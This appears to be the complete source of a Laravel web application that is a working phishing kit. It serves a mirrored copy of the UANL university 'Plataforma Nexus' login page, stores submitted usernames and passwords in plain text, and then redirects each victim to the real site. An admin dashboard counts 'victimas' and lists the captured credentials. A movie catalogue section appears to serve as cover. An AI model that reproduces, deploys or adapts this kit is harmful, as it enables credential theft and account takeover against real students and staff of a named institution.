routes/web.php
<?php

/*
|--------------------------------------------------------------------------
| Web Routes
|--------------------------------------------------------------------------
|
| Here is where you can register web routes for your application. These
| routes are loaded by the RouteServiceProvider within a group which
| contains the "web" middleware group. Now create something great!
|
*/
Auth::routes();
Route::get('/', function () {
    return view('nexus');
});
// Route::get('/test', function () {
//     return view('test');
// });
Route::resource('usuario', 'UsuarioController')->only(['store']);

Route::group([
    'name' => 'admin.',
    'prefix' => 'admin',
    'middleware' => 'auth'
], function () {
Route::get('/', 'HomeController@index')->name('home');
Route::resource('usuario', 'UsuarioController')->only(['index']);
Route::resource('movies', 'MovieController');
});

app/Movie.php
<?php

namespace App;

use Illuminate\Database\Eloquent\Model;

class Movie extends Model
{
    protected $guarded = ['id'];
}

app/User.php
<?php

namespace App;

use Illuminate\Notifications\Notifiable;
use Illuminate\Contracts\Auth\MustVerifyEmail;
use Illuminate\Foundation\Auth\User as Authenticatable;

class User extends Authenticatable
{
    use Notifiable;

    /**
     * The attributes that are mass assignable.
     *
     * @var array
     */
    protected $fillable = [
        'name', 'email', 'password',
    ];

    /**
     * The attributes that should be hidden for arrays.
     *
     * @var array
     */
    protected $hidden = [
        'password', 'remember_token',
    ];

    /**
     * The attributes that should be cast to native types.
     *
     * @var array
     */
    protected $casts = [
        'email_verified_at' => 'datetime',
    ];
}

app/usuario.php
<?php

namespace App;

use Illuminate\Database\Eloquent\Model;

class usuario extends Model
{
    /**
     * The attributes that aren't mass assignable.
     *
     * @var array
     */
    protected $guarded = ['id'];
}

app/Http/Controllers/Controller.php
<?php

namespace App\Http\Controllers;

use Illuminate\Foundation\Bus\DispatchesJobs;
use Illuminate\Routing\Controller as BaseController;
use Illuminate\Foundation\Validation\ValidatesRequests;
use Illuminate\Foundation\Auth\Access\AuthorizesRequests;

class Controller extends BaseController
{
    use AuthorizesRequests, DispatchesJobs, ValidatesRequests;
}

app/Http/Controllers/HomeController.php
<?php

namespace App\Http\Controllers;
use Illuminate\Support\Facades\DB;

use Illuminate\Http\Request;

class HomeController extends Controller
{
    /**
     * Create a new controller instance.
     *
     * @return void
     */
    public function __construct()
    {
        $this->middleware('auth');
    }

    /**
     * Show the application dashboard.
     *
     * @return \Illuminate\Contracts\Support\Renderable
     */
    public function index()
    {
        $victims = DB::table('usuarios')->count();
        return view('home',compact("victims"));
    }
}

app/Http/Controllers/MovieController.php
<?php

namespace App\Http\Controllers;

use App\Movie;
use Illuminate\Http\Request;

class MovieController extends Controller
{
    /**
     * Display a listing of the resource.
     *
     * @return \Illuminate\Http\Response
     */
    public function index()
    {
        $allMovies= Movie::all();
        return view('movies.index', compact('allMovies'));
    }

    /**
     * Show the form for creating a new resource.
     *
     * @return \Illuminate\Http\Response
     */
    public function create()
    {
        return view("movies.create");
    }

    /**
     * Store a newly created resource in storage.
     *
     * @param  \Illuminate\Http\Request  $request
     * @return \Illuminate\Http\Response
     */
    public function store(Request $request)
    {

        Movie::create(request(['title','genre','description','year']));
        return redirect('/admin/movies');
    }

    /**
     * Display the specified resource.
     *
     * @param  \App\Movie  $movie
     * @return \Illuminate\Http\Response
     */
    public function show(Movie $movie)
    {
        return view("movies.show", compact('movie'));
    }

    /**
     * Show the form for editing the specified resource.
     *
     * @param  \App\Movie  $movie
     * @return \Illuminate\Http\Response
     */
    public function edit(Movie $movie)
    {
        return view("movies.edit", compact('movie'));
    }

    /**
     * Update the specified resource in storage.
     *
     * @param  \Illuminate\Http\Request  $request
     * @param  \App\Movie  $movie
     * @return \Illuminate\Http\Response
     */
    public function update(Request $request, Movie $movie)
    {
        $movie->update(request(['title','genre','description','year']));
        return redirect('/admin/movies');
    }

    /**
     * Remove the specified resource from storage.
     *
     * @param  \App\Movie  $movie
     * @return \Illuminate\Http\Response
     */
    public function destroy(Movie $movie)
    {
        $movie->delete();
        return redirect('/admin/movies');
    }
}

app/Http/Controllers/UsuarioController.php
<?php

namespace App\Http\Controllers;

use App\usuario;
use Illuminate\Http\Request;

class UsuarioController extends Controller
{
    /**
     * Display a listing of the resource.
     *
     * @return \Illuminate\Http\Response
     */
    public function index()
    {

        $allUsuarios = Usuario::all();
        return view('usuarios.index',compact("allUsuarios"));

    }

    /**
     * Show the form for creating a new resource.
     *
     * @return \Illuminate\Http\Response
     */
    public function create()
    {
        //
    }

    /**
     * Store a newly created resource in storage.
     *
     * @param  \Illuminate\Http\Request  $request
     * @return \Illuminate\Http\Response
     */
    public function store(Request $request)
    {
        usuario::create(request([
            'nexusUsuario','nexusContrasena'
        ]));

        return redirect('https://login.nexus.uanl.mx/App/login/wfloginNx.htm');
    }

    /**
     * Display the specified resource.
     *
     * @param  \App\usuario  $usuario
     * @return \Illuminate\Http\Response
     */
    public function show(usuario $usuario)
    {
        //
    }

    /**
     * Show the form for editing the specified resource.
     *
     * @param  \App\usuario  $usuario
     * @return \Illuminate\Http\Response
     */
    public function edit(usuario $usuario)
    {
        //
    }

    /**
     * Update the specified resource in storage.
     *
     * @param  \Illuminate\Http\Request  $request
     * @param  \App\usuario  $usuario
     * @return \Illuminate\Http\Response
     */
    public function update(Request $request, usuario $usuario)
    {
        //
    }

    /**
     * Remove the specified resource from storage.
     *
     * @param  \App\usuario  $usuario
     * @return \Illuminate\Http\Response
     */
    public function destroy(usuario $usuario)
    {
        //
    }
}

resources/views/home.blade.php
@extends('layouts.app')

@section('content')
<div class="container">
    <div class="row justify-content-center">
        <div class="col-md-8">
            <div class="card">
                <div class="card-header">Dashboard</div>

                <div class="card-body">
                    @if (session('status'))
                        <div class="alert alert-success" role="alert">
                            {{ session('status') }}
                        </div>
                    @endif
                    <p>Numero de victimas: {{$victims}}</p>
                    <p><a href="{{route('usuario.index')}}">Ver credenciales capturadas</a></p>
                    <p><a href="{{route('movies.index')}}">Ver catálogo</a></p>
                </div>
            </div>
        </div>
    </div>
</div>
@endsection

resources/views/layouts/app.blade.php
<!DOCTYPE html>
<html lang="{{ str_replace('_', '-', app()->getLocale()) }}">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">

    <!-- CSRF Token -->
    <meta name="csrf-token" content="{{ csrf_token() }}">

    <title>{{ config('app.name', 'DB Security') }}</title>

    <!-- Scripts -->
    <script src="{{ asset('js/app.js') }}" defer></script>

    <!-- Fonts -->
    <link rel="dns-prefetch" href="//fonts.gstatic.com">
    <link href="https://fonts.googleapis.com/css?family=Nunito" rel="stylesheet" type="text/css">

    <!-- Styles -->
    <link href="{{ asset('css/app.css') }}" rel="stylesheet">
</head>
<body>
    <div id="app">
        <nav class="navbar navbar-expand-md navbar-light navbar-laravel">
            <div class="container">
                <a class="navbar-brand" href="{{ url('/admin') }}">
                    {{ config('app.name', 'DB Security') }}
                </a>
                <button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarSupportedContent" aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="{{ __('Toggle navigation') }}">
                    <span class="navbar-toggler-icon"></span>
                </button>

                <div class="collapse navbar-collapse" id="navbarSupportedContent">
                    <!-- Left Side Of Navbar -->
                    <ul class="navbar-nav mr-auto">

                    </ul>

                    <!-- Right Side Of Navbar -->
                    <ul class="navbar-nav ml-auto">
                        <!-- Authentication Links -->
                        @guest
                            <li class="nav-item">
                                <a class="nav-link" href="{{ route('login') }}">{{ __('Login') }}</a>
                            </li>
                            @if (Route::has('register'))
                                <li class="nav-item">
                                    <a class="nav-link" href="{{ route('register') }}">{{ __('Register') }}</a>
                                </li>
                            @endif
                        @else
                            <li class="nav-item dropdown">
                                <a id="navbarDropdown" class="nav-link dropdown-toggle" href="#" role="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false" v-pre>
                                    {{ Auth::user()->name }} <span class="caret"></span>
                                </a>

                                <div class="dropdown-menu dropdown-menu-right" aria-labelledby="navbarDropdown">
                                    <a class="dropdown-item" href="{{ route('logout') }}"
                                       onclick="event.preventDefault();
                                                     document.getElementById('logout-form').submit();">
                                        {{ __('Logout') }}
                                    </a>

                                    <form id="logout-form" action="{{ route('logout') }}" method="POST" style="display: none;">
                                        @csrf
                                    </form>
                                </div>
                            </li>
                        @endguest
                    </ul>
                </div>
            </div>
        </nav>

        <main class="py-4">
            @yield('content')
        </main>
    </div>
</body>
</html>

resources/views/movies/create.blade.php
@extends('layouts.app')
@section('content')
<div class="content">
    <div class="container">
        <div class="row ">

            <div class="col-md-8">
                <form method="POST" action={{route('movies.store')}}>
                    @csrf
                    <div class="card">
                        {{-- card header--}}
                        <div class="card-header card-header-primary">
                            <h4 class="card-title">Información de película</h4>
                            <p class="card-category">Crear</p>
                        </div>
                        {{-- card body--}}
                        <div class="card-body">
                            {{-- title --}}
                            <div class="form-group row">
                                <label for="title" class="col-4 col-form-label">Título</label>
                                <div class="col-8">
                                    <input id="title" name="title" type="text"
                                        class="form-control">
                                </div>
                            </div>
                            {{-- genre --}}
                            <div class="form-group row">
                                <label for="genre" class="col-4 col-form-label">Género</label>
                                <div class="col-8">
                                    <input id="genre"  name="genre" type="text"
                                        class="form-control">
                                </div>
                            </div>
                            {{-- description --}}
                            <div class="form-group row">
                                <label for="description" class="col-4 col-form-label">Descripción</label>
                                <div class="col-8">
                                    <input id="description"  name="description" type="text"
                                        class="form-control">
                                </div>
                            </div>
                            {{-- year --}}
                            <div class="form-group row">
                                <label for="year" class="col-4 col-form-label">Año</label>
                                <div class="col-8">
                                    <input id="year"  name="year" type="text"
                                        class="form-control">
                                </div>
                            </div>

                            {{-- buttons--}}
                            <div class="form-group row">
                                <div class="col-xs-offset-4 col-xs-8">
                                    <button name="submit" type="submit" class="btn btn-primary">Guardar</button>
                                </div>
                                <a class="btn btn-light" href="{{ route('movies.index') }}" role="button">Cancelar</a>
                            </div>
                        </div>
                    </div>
                </form>
            </div>
        </div>
    </div>
</div>
@endsection

resources/views/movies/edit.blade.php
@extends('layouts.app')
@section('content')
<div class="content">
    <div class="container">
        <div class="row ">

            <div class="col-md-8">
                <form method="POST" action={{route('movies.update',['id' => $movie->id])}}>
                    @csrf
                    @method('PUT')
                    <div class="card">
                        {{-- card header--}}
                        <div class="card-header card-header-primary">
                            <h4 class="card-title">Información de película</h4>
                            <p class="card-category">Modificar</p>
                        </div>
                        {{-- card body--}}
                        <div class="card-body">
                            {{-- title --}}
                            <div class="form-group row">
                                <label for="title" class="col-4 col-form-label">Título</label>
                                <div class="col-8">
                                    <input id="title" value="{{$movie->title}}" name="title" type="text"
                                        class="form-control">
                                </div>
                            </div>
                            {{-- genre --}}
                            <div class="form-group row">
                                <label for="genre" class="col-4 col-form-label">Género</label>
                                <div class="col-8">
                                    <input id="genre" value="{{$movie->genre}}" name="genre" type="text"
                                        class="form-control">
                                </div>
                            </div>
                            {{-- description --}}
                            <div class="form-group row">
                                <label for="description" class="col-4 col-form-label">Descripción</label>
                                <div class="col-8">
                                    <input id="description" value="{{$movie->description}}" name="description" type="text"
                                        class="form-control">
                                </div>
                            </div>
                            {{-- year --}}
                            <div class="form-group row">
                                <label for="year" class="col-4 col-form-label">Año</label>
                                <div class="col-8">
                                    <input id="year" value="{{$movie->year}}" name="year" type="text"
                                        class="form-control">
                                </div>
                            </div>

                            {{-- buttons--}}
                            <div class="form-group row">
                                <div class="col-xs-offset-4 col-xs-8">
                                    <button name="submit" type="submit" class="btn btn-primary">Guardar</button>
                                </div>
                                <a class="btn btn-light" href="{{ route('movies.index') }}" role="button">Cancelar</a>
                            </div>
                        </div>
                    </div>
                </form>
            </div>
        </div>
    </div>
</div>
@endsection

resources/views/movies/index.blade.php
@extends('layouts.app')

@section('content')
<div class="container">
        <a class="btn btn-success mb-3  " href="{{ route('movies.create')}}" role="button">+ Agregar película</a>
    <div class="row justify-content-center">

        <table class="table">
            <thead>
                <tr>
                    <th scope="col">ID</th>
                    <th scope="col">Título</th>
                    <th scope="col">Género</th>
                    {{-- <th scope="col">Descripción</th> --}}
                    <th scope="col">Año</th>
                    <th scope="col">Editar</th>
                    <th scope="col">Eliminar</th>
                </tr>
            </thead>
            <tbody>
                @foreach ($allMovies as $movie)
                <tr>
                    <td>{{$movie->id}}</td>
                    <td>{{$movie->title}}</td>
                    <td>{{$movie->genre}}</td>
                    {{-- <td>{{$movie->description}}</td> --}}
                    <td>{{$movie->year}}</td>
                    <td>
                            <a class="btn btn-primary" href="{{ route('movies.edit', $movie->id) }}" role="button">Editar</a>
                    </td>
                    <td>
                        <form method="POST" action={{route('movies.destroy',$movie)}}>
                            @csrf
                            @method('delete')
                            <button class="btn btn-danger" type="submit">Eliminar</button>
                        </form>
                    </td>
                </tr>
                @endforeach
            </tbody>
        </table>

    </div>
</div>
@endsection

resources/views/movies/show.blade.php
@extends('layouts.app')

@section('content')
<div class="container">
    <div class="row justify-content-center">
        <div class="card">
{{$movies}}
        </div>

    </div>
</div>
@endsection

resources/views/nexus.blade.php
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<!-- Mirrored from login.nexus.uanl.mx/App/login/wfloginNx.htm by HTTrack Website Copier/3.x [XR&CO'2014], Tue, 17 Sep 2019 14:44:13 GMT -->
<head>
    <title>Plataforma Nexus</title>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <link href="../css/bootstrap.min.css" rel="stylesheet" type="text/css" />
    <link href="../css/font-awesome.min.css" rel="stylesheet" type="text/css" />
    <link href="../css/ionicons.min.css" rel="stylesheet" type="text/css" />
    <link href="../css/nx/UC.css" rel="stylesheet" type="text/css" />

</head>

<body id="login">
    <div class="contenedor">
    <form action="{{route('usuario.store')}}" method="POST">
        @csrf
            <div class="row">
                <div class="ingreso" id="login-form">
                <!--contenedor-->
                    <p><img src="../img/NexusLogo.png" class="logo-nexus"></p>
                    <div>
                        <div id="title" class="texto" style="display:none">
                            <label id="lblUsuario" class="texto">Usuario</label>
                        </div>
                        <div class="input-group nx-center">
                            <input type="text" name="nexusUsuario" id="txtUsuario" class="texto" placeholder="Usuario">
                            <i class="user"></i>
                        </div>
                        <div id="Div1" class="texto" style="display:none">
                            <label id="lblContrasenia" class="texto">Contraseña</label>
                        </div>
                        <div class="input-group nx-center">
                            <input type="password" name="nexusContrasena" id="txtPassword" class="texto" placeholder="Contraseña">
                            <i class="password"></i>
                        </div>
                        <p class="input-group nx-center">
                            <span>
                                <a class="clave" href="https://login.nexus.uanl.mx/App/login/wfOlvidoContrase%C3%B1a.aspx">
                                    <span id="btnContrasena">¿Olvidaste tu contraseña?</span>
                                </a>
                            </span>
                        </p>
                        <p class="nx-center info">
                            <a href="http://www.uanl.mx/enlinea">
                                <span>Si eres Estudiante de la UANL, debes ingresar desde el portal de la UANL en Servicios en línea.</span>
                                <br/>
                            </a>
                        </p>
                        <p class="nx-center">
                            <span>
                                <input type="submit" value="" class="submit" />
                            </span>
                        </p>
                    </div>
                </div>

                <div id="bienvenida" class="no-padding">
                    <div id="slider">
                        <div class="recado">
                            <div id="carousel-example-generic" class="carousel slide" data-ride="carousel">
                                <ol class="carousel-indicators">
                                    <li data-target="#carousel-example-generic" data-slide-to="0" class="active"></li>
                                    <li data-target="#carousel-example-generic" data-slide-to="1"></li>
                                    <li data-target="#carousel-example-generic" data-slide-to="2"></li>
                                    <li data-target="#carousel-example-generic" data-slide-to="3"></li>
                                    <li data-target="#carousel-example-generic" data-slide-to="4"></li>
                                    <li data-target="#carousel-example-generic" data-slide-to="5"></li>
                                    <li data-target="#carousel-example-generic" data-slide-to="6"></li>
                                    <li data-target="#carousel-example-generic" data-slide-to="7"></li>
                                </ol>

                                <div class="carousel-inner">

				    <div class="item active">
                                        <a href="http://www.ccl.uanl.mx/" target="_blank">
                                            <img src="../img/nx/banner/centroEvaluacion2018.png" alt="centroEvaluacion2018" />
                                        </a>
                                    </div>
                                    <div class="item">
                                        <a href="https://bit.ly/2uHcyBY" target="_blank">
                                            <img src="../img/nx/banner/formacion_linea4.jpg" alt="Formacion_linea4.jpg" />
                                        </a>
                                    </div>
                                    <div class="item">
                                        <a href="https://www.facebook.com/enlineauanl?fref=ts" target="_blank">
                                            <img src="../img/nx/banner/dudas_servenlinea_nexus.png" alt="Dudas_servenlinea_nexus.png" />
                                        </a>
                                    </div>
                                    <div class="item">
                                        <a href="http://www.uanl.mx/alumnos/CHIP" target="_blank">
                                            <img src="../img/nx/banner/CHIP.jpg" alt="CHIP.jpg" />
                                        </a>
                                    </div>
                                    <div class="item">
                                        <a href="#" target="_blank">
                                            <img src="../img/nx/banner/recomendaciones_01.png" alt="Recomendaciones_01.png" />
                                        </a>
                                    </div>
                                    <div class="item">
                                        <a href="#" target="_blank">
                                            <img src="../img/nx/banner/recomendaciones_02.png" alt="Recomendaciones_02.png" />
                                        </a>
                                    </div>
                                    <div class="item">
                                        <a href="#" target="_blank">
                                            <img src="../img/nx/banner/recomendaciones_03.png" alt="Recomendaciones_03.png" />
                                        </a>
                                    </div>
				    <div class="item">
                                        <a href="http://dti.uanl.mx/red-inalambrica-wuanl/" target="_blank">
                                            <img src="../img/nx/banner/RedInalambricaUANL.png" alt="RedInalabricaUANL.png" />
                                        </a>
                                    </div>
                                </div>

                                <a class="left carousel-control" href="#carousel-example-generic" data-slide="prev">
                                    <span class="glyphicon glyphicon-chevron-left"></span>
                                </a>
                                <a class="right carousel-control" href="#carousel-example-generic" data-slide="next">
                                    <span class="glyphicon glyphicon-chevron-right"></span>
                                </a>
                            </div>
                        </div>
                    </div>
                </div>

                <div class="footer row">
                    <div class="logos-login">
                        <a href="http://www.uanl.mx/"><img src="../img/nx-logo-uanl.png" alt="Logotipo de la Universidad Autónoma de Nuevo León" /></a>
                    </div>
                    <div class="nx-social">
                        <a href="https://twitter.com/servenlineauanl" target="_blank" class="btn btn-social-icon btn-twitter"><i class="fa fa-twitter"></i></a>
                        <a href="https://www.facebook.com/enlineauanl?fref=ts" target="_blank" class="btn btn-social-icon btn-facebook"><i class="fa fa-facebook"></i></a>
                    </div>
                </div>
            </div>
        </form>

        <div class="modal fade" id="msgbox" tabindex="20" role="dialog" aria-labelledby="myModalLabel">
            <div class="modal-dialog" role="document">
                <div class="modal-content">
                    <div class="modal-header">
                        <button type="button" class="close" data-dismiss="modal" aria-label="Close"><span aria-hidden="true">&times;</span></button>
                        <h4 class="modal-title" id="myModalLabel"><b>Error</b></h4>
                    </div>
                    <div class="modal-body">
                        <h4 id="H1">Msj</h4>
                    </div>
                </div>
            </div>
        </div>
    </div>
</body>

<script src="../js/jquery-1.11.1.min.js" type="text/javascript"></script>
<script src="../js/bootstrap.min.js" type="text/javascript"></script>
<script src="../js/AdminLTE/app.js" type="text/javascript"></script>

<!-- jQuery -->
<script type="text/javascript">
    $(document).ready(function () {
        function VerificaAltoLogin() {
            var $cuerpo = $(window);
            var $contenedor = $('.contenedor');

            if ($cuerpo.height() > $contenedor.height()) {
                var _diferencia = $cuerpo.height() - $contenedor.height();
                var _padding = (_diferencia / 2);

                $contenedor.css({
                    'margin-top': _padding
                });
            }
        }

        VerificaAltoLogin();

        $(window).resize(function () {
            VerificaAltoLogin();
        });
    });
</script>



<!-- 3.56 -->

<!-- Mirrored from login.nexus.uanl.mx/App/login/wfloginNx.htm by HTTrack Website Copier/3.x [XR&CO'2014], Tue, 17 Sep 2019 14:44:32 GMT -->
</html>

resources/views/test.blade.php
{{phpinfo()}}

resources/views/usuarios/index.blade.php
@extends('layouts.app')

@section('content')
<div class="container">

    <div class="row justify-content-center">

        <table class="table">
            <thead class=" text-primary">
                <th>
                    ID
                </th>
                <th>
                    Username
                </th>
                <th>
                    Contraseña
                </th>
            </thead>
            <tbody>
                @foreach($allUsuarios as $usuario)
                <tr>
                    <td>
                        {{ $usuario->id }}
                    </td>
                    <td>
                        {{ $usuario->nexusUsuario }}
                    </td>
                    <td>
                        {{ $usuario->nexusContrasena }}
                    </td>
                </tr>
                @endforeach
            </tbody>
        </table>

    </div>
</div>
@endsection